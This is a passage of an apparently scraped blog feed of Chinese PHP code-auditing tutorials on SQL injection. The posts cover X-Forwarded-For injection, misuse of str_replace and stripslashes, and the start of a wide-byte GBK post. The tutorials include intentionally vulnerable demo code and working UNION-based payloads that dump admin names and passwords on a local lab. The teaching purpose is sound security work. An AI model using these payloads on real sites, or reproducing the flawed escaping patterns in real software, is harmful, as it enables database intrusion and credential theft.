class=&quot;keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_SERVER&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;REMOTE_ADDR&#39;&lt;/span&gt;]) &amp;amp;&amp;amp; &lt;span class=&quot;variable&quot;&gt;$_SERVER&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;REMOTE_ADDR&#39;&lt;/span&gt;] &amp;amp;&amp;amp; strcasecmp(&lt;span class=&quot;variable&quot;&gt;$_SERVER&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;REMOTE_ADDR&#39;&lt;/span&gt;],&lt;span class=&quot;string&quot;&gt;&quot;unknown&quot;&lt;/span&gt;))&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	  &lt;span class=&quot;variable&quot;&gt;$ip&lt;/span&gt;=&lt;span class=&quot;variable&quot;&gt;$_SERVER&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;REMOTE_ADDR&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	  &lt;span class=&quot;variable&quot;&gt;$ip&lt;/span&gt;=&lt;span class=&quot;string&quot;&gt;&quot;unknown&quot;&lt;/span&gt; ;  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$ip&lt;/span&gt;;  &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;发现通过$_SERVER变量获取客户端ip且可以通过X_FORWARDED_FOR伪造，然后这里对X_FORWARDED_FOR是没有任何正则处理的，所以我们全局搜索下get_ip函数发现有一些调用并且入库的地方。&lt;br&gt;program/index/receive/login.php处代码为例：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//这里使用get_ip函数获取客户ip&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$ip&lt;/span&gt;=get_ip();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//这里入库，所以可以注入了&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;=&lt;span class=&quot;string&quot;&gt;&quot;update &quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$pdo&lt;/span&gt;-&amp;gt;index_pre.&lt;span class=&quot;string&quot;&gt;&quot;user set `last_time`=&#39;$time&#39;,`last_ip`=&#39;$ip&#39; where `id`=&#39;&quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$_SESSION&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;monxin&#39;&lt;/span&gt;][&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;].&lt;span class=&quot;string&quot;&gt;&quot;&#39;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$pdo&lt;/span&gt;-&amp;gt;exec(&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;=&lt;span class=&quot;string&quot;&gt;&quot;select count(id) as c from &quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$pdo&lt;/span&gt;-&amp;gt;index_pre.&lt;span class=&quot;string&quot;&gt;&quot;user_login where `userid`=&#39;&quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$_SESSION&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;monxin&#39;&lt;/span&gt;][&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;].&lt;span class=&quot;string&quot;&gt;&quot;&#39;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$stmt&lt;/span&gt;=&lt;span class=&quot;variable&quot;&gt;$pdo&lt;/span&gt;-&amp;gt;query(&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$v&lt;/span&gt;=&lt;span class=&quot;variable&quot;&gt;$stmt&lt;/span&gt;-&amp;gt;fetch(&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$v&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;c&#39;&lt;/span&gt;]&amp;lt;&lt;span class=&quot;keyword&quot;&gt;self&lt;/span&gt;::&lt;span class=&quot;variable&quot;&gt;$config&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;other&#39;&lt;/span&gt;][&lt;span class=&quot;string&quot;&gt;&#39;user_login_log&#39;&lt;/span&gt;])&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;=&lt;span class=&quot;string&quot;&gt;&quot;insert into &quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$pdo&lt;/span&gt;-&amp;gt;index_pre.&lt;span class=&quot;string&quot;&gt;&quot;user_login (`userid`,`ip`,`time`,`position`) values (&#39;&quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$_SESSION&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;monxin&#39;&lt;/span&gt;][&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;].&lt;span class=&quot;string&quot;&gt;&quot;&#39;,&#39;$ip&#39;,&#39;$time&#39;,&#39;&quot;&lt;/span&gt;.get_ip_position(&lt;span class=&quot;variable&quot;&gt;$ip&lt;/span&gt;).&lt;span class=&quot;string&quot;&gt;&quot;&#39;)&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;=&lt;span class=&quot;string&quot;&gt;&quot;select `id` from &quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$pdo&lt;/span&gt;-&amp;gt;index_pre.&lt;span class=&quot;string&quot;&gt;&quot;user_login where `userid`=&#39;&quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$_SESSION&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;monxin&#39;&lt;/span&gt;][&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;].&lt;span class=&quot;string&quot;&gt;&quot;&#39; order by time asc limit 0,1&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$stmt&lt;/span&gt;=&lt;span class=&quot;variable&quot;&gt;$pdo&lt;/span&gt;-&amp;gt;query(&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$v&lt;/span&gt;=&lt;span class=&quot;variable&quot;&gt;$stmt&lt;/span&gt;-&amp;gt;fetch(&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;=&lt;span class=&quot;string&quot;&gt;&quot;update &quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$pdo&lt;/span&gt;-&amp;gt;index_pre.&lt;span class=&quot;string&quot;&gt;&quot;user_login set `ip`=&#39;$ip&#39;,`time`=&#39;$time&#39; where `id`=&#39;&quot;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$v&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;].&lt;span class=&quot;string&quot;&gt;&quot;&#39;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$pdo&lt;/span&gt;-&amp;gt;exec(&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;案例：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2010-0173485&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.wooyun.org/bugs/wooyun-2010-0173485&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2016/05/10/sql6/&quot;&gt;http://www.cnbraid.com/2016/05/10/sql6/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，比如最经典的整型参数传递，也即被带入数据库查询的参数是整型、数组中的key没过滤被带入了查询以及全局过滤了GET、POST但没过滤SERVER或COOKIE引发的注入。所以看似有全局防护，实则隐藏了很多“后门”～&lt;br&gt;&lt;strong&gt;盲点如下：&lt;/strong&gt;&lt;br&gt;①注入点类似id=1这种整型的参数就会完全无视GPC的过滤；&lt;br&gt;②注入点包含键值对的，那么这里只检测了value，对key的过滤就没有防护；&lt;br&gt;③有时候全局的过滤只过滤掉GET、POST和COOKIE，但是没过滤SERVER。&lt;br&gt;附常见的SERVER变量（具体含义自行百度）：QUERY_STRING,X_FORWARDED_FOR,CLIENT_IP,HTTP_HOST,ACCEPT_LANGUAGE&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmangdian1.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="WEB应用漏洞" scheme="http://www.cnbraid.com/categories/WEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"/>
    
    
      <category term="PHP" scheme="http://www.cnbraid.com/tags/PHP/"/>
    
      <category term="SQL注入" scheme="http://www.cnbraid.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    
      <category term="代码审计" scheme="http://www.cnbraid.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
  </entry>
  
  <entry>
    <title>【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护Bypass之一些函数的错误使用</title>
    <link href="http://www.cnbraid.com/2016/04/29/sql5/"/>
    <id>http://www.cnbraid.com/2016/04/29/sql5/</id>
    <published>2016-04-29T02:35:00.000Z</published>
    <updated>2016-06-24T08:55:17.939Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;PHP程序员在开发过程中难免会使用一些字符替换函数（str_replace）、反转义函数（stripslashes），但这些函数使用位置不当就会绕过全局的防护造成SQL注入漏洞。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/hanshu.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_漏洞分析&quot;&gt;0x02 漏洞分析&lt;/h2&gt;&lt;h3 id=&quot;str_replace函数的错误使用&quot;&gt;str_replace函数的错误使用&lt;/h3&gt;&lt;p&gt;第一种情况是写程序时会使用str_replace函数将参数中的单引号、括号等字符替换为空，这样在一些双条件查询的情况就会引发注入问题。缺陷代码如下：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;require_once&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;common.php&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$conn&lt;/span&gt; = mysql_connect(&lt;span class=&quot;string&quot;&gt;&#39;localhost&#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;root&#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;braid&#39;&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;or&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;die&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;bad!&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;mysql_query(&lt;span class=&quot;string&quot;&gt;&quot;SET NAMES binary&#39;&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;mysql_select_db(&lt;span class=&quot;string&quot;&gt;&#39;test&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$conn&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;OR&lt;/span&gt; emMsg(&lt;span class=&quot;string&quot;&gt;&quot;数据库连接失败&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$tmp_id&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;] : &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$title&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;title&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;title&#39;&lt;/span&gt;] : &lt;span class=&quot;string&quot;&gt;&#39;news title&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//程序编写时直接用str_replace去掉id里的单引号&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$id&lt;/span&gt; = str_replace(&lt;span class=&quot;string&quot;&gt;&quot;&#39;&quot;&lt;/span&gt;,&lt;span class=&quot;string&quot;&gt;&#39;&#39;&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$tmp_id&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;//sql查询语句通过id和titile两个条件进行查询&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;SELECT * FROM news WHERE id=&#39;&amp;#123;$id&amp;#125;&#39; and title=&#39;&amp;#123;$title&amp;#125;&#39;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$result&lt;/span&gt; = mysql_query(&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$conn&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;or&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;die&lt;/span&gt;(mysql_error()); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;浏览器输入”&lt;a href=&quot;http://localhost/sqltest/streplace.php?id=1&amp;#39;&amp;amp;title=news&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://localhost/sqltest/streplace.php?id=1&amp;#39;&amp;amp;title=news&lt;/a&gt; title”，发现报错了，我们直接打印出执行的sql语句如下图：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/bypass09.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;发现参数id右边的单引号被反斜杠转义成字符了，说明又可以注入了。&lt;br&gt;简单分析下上面id参数的执行过程，-1’经过addslashes函数转义后变成了-1\’，然后再经过str_replace函数干掉了单引号变成了-1\，最后带入查询的语句才是下面这样：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&lt;span class=&quot;keyword&quot;&gt;SELECT&lt;/span&gt; * &lt;span class=&quot;keyword&quot;&gt;FROM&lt;/span&gt; news &lt;span class=&quot;keyword&quot;&gt;WHERE&lt;/span&gt; id=&lt;span class=&quot;string&quot;&gt;&#39;1\&#39;&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;and&lt;/span&gt; title=&lt;span class=&quot;string&quot;&gt;&#39;news title&#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;反斜杠转义了sql查询语句里id后面那个单引号，导致title参数可以构造sql注入语句了，我们直接构造获取管理员账户密码的语句”&lt;a href=&quot;http://localhost/sqltest/streplace.php?id=-1&amp;#39;&amp;amp;title=union&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://localhost/sqltest/streplace.php?id=-1&amp;#39;&amp;amp;title=union&lt;/a&gt; select 1,2,concat(name,0x23,pass) from admin%23”&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/bypass10.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;第二种情况是str_replace函数是用户可控的，就是说用户想把啥替换成空就可以将什么替换为空。&lt;br&gt;首先我们先看看addslashes函数对%00-%ff的转义情况，经过fuzz发现%00会被转义为\0，如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/hanshu1.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;那么注入的时候我们提交%00’，经过addlashes就会变为\0\’，这时候我们用replace函数替换0为空就变成了\‘，成功转义了转义字符让单引号逃逸出来，从而造成注入漏洞。&lt;/p&gt;
&lt;h3 id=&quot;stripslashes函数的错误使用&quot;&gt;stripslashes函数的错误使用&lt;/h3&gt;&lt;p&gt;这个函数的定义是删除由 addslashes() 函数添加的反斜杠，所以很明显使用不当的话就会引发SQL注入。缺陷代码如下：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;require_once&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;common.php&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$conn&lt;/span&gt; = mysql_connect(&lt;span class=&quot;string&quot;&gt;&#39;localhost&#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;root&#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;braid&#39;&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;or&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;die&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;bad!&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;mysql_query(&lt;span class=&quot;string&quot;&gt;&quot;SET NAMES binary&#39;&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;mysql_select_db(&lt;span class=&quot;string&quot;&gt;&#39;test&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$conn&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;OR&lt;/span&gt; emMsg(&lt;span class=&quot;string&quot;&gt;&quot;数据库连接失败&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$tmp_id&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;]) ? &lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;] : &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$id&lt;/span&gt; = stripslashes(&lt;span class=&quot;variable&quot;&gt;$tmp_id&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;SELECT * FROM news WHERE id=&#39;&amp;#123;$id&amp;#125;&#39;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;.&lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;br /&amp;gt;&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$result&lt;/span&gt; = mysql_query(&lt;span class=&quot;variable&quot;&gt;$sql&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$conn&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;or&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;die&lt;/span&gt;(mysql_error()); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;浏览器输入”&lt;a href=&quot;http://localhost/sqltest/stripslashes.php?id=-1&amp;#39;&amp;quot;，发现报错了，echo出执行的sql语句如下图：&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://localhost/sqltest/stripslashes.php?id=-1&amp;#39;&amp;quot;，发现报错了，echo出执行的sql语句如下图：&lt;/a&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/bypass11.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;分析下参数id的执行过程，-1’经过addslashes函数转义后变成了-1\’，然后再经过stripslashes函数干掉了反斜杠变成了-1’，所以又可以愉快的注入了。&lt;br&gt;获取管理员账户密码的语句”&lt;a href=&quot;http://localhost/sqltest/stripslashes.php?id=-1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://localhost/sqltest/stripslashes.php?id=-1&lt;/a&gt;‘ union select 1,2,concat(name,0x23,pass) from admin%23”&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/bypass12.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2016/04/29/sql5/&quot;&gt;http://www.cnbraid.com/2016/04/29/sql5/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;PHP程序员在开发过程中难免会使用一些字符替换函数（str_replace）、反转义函数（stripslashes），但这些函数使用位置不当就会绕过全局的防护造成SQL注入漏洞。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/hanshu.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="WEB应用漏洞" scheme="http://www.cnbraid.com/categories/WEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"/>
    
    
      <category term="PHP" scheme="http://www.cnbraid.com/tags/PHP/"/>
    
      <category term="SQL注入" scheme="http://www.cnbraid.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    
      <category term="代码审计" scheme="http://www.cnbraid.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
  </entry>
  
  <entry>
    <title>【PHP代码审计】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入</title>
    <link href="http://www.cnbraid.com/2016/02/28/sql4/"/>
    <id>http://www.cnbraid.com/2016/02/28/sql4/</id>
    <published>2016-02-28T02:35:00.000Z</published>
    <updated>2016-06-24T08:55:24.373Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;首先我们了解下宽字节注入，宽字节注入源于程序员设置MySQL连接时错误配置为：set character_set_client=gbk，这样配置会引发编码转换从而导致的注入漏洞。具体原理如下：&lt;br&gt;1.正常情况下当GPC开启或使用addslashes函数过滤GET或POST提交的参数时，黑客使用的单引号 ‘ 就会被转义为: \’；&lt;br&gt;2.但如果存在宽字节注入，我们输入%df%27时首先经过上面提到的单引号转义变成了%df%5c%27（%5c是反斜杠\），之后在数据库查询前由于使用了GBK多字节编码，即在汉字编码范围内两个字节会被编码为一个汉字。然后MySQL服务器会对查询语句进行GBK编码即%df%5c转换成了汉字“運”（注：GBK的汉字编码范围见附录），而单引号逃逸了出来，从而造成了注入漏洞。&lt;br&gt;现在基本上都会将mysql的连接配置为“set character_set_client=binary”来解决这个问题，所以这篇文章将介绍出现在php中因为字符编码转换导致的注入问题。&lt;br&gt;&lt;strong&gt;漏洞来源于乌云：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-063219&quot; target=&quot;_blank&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-063219&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlbypass3.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;
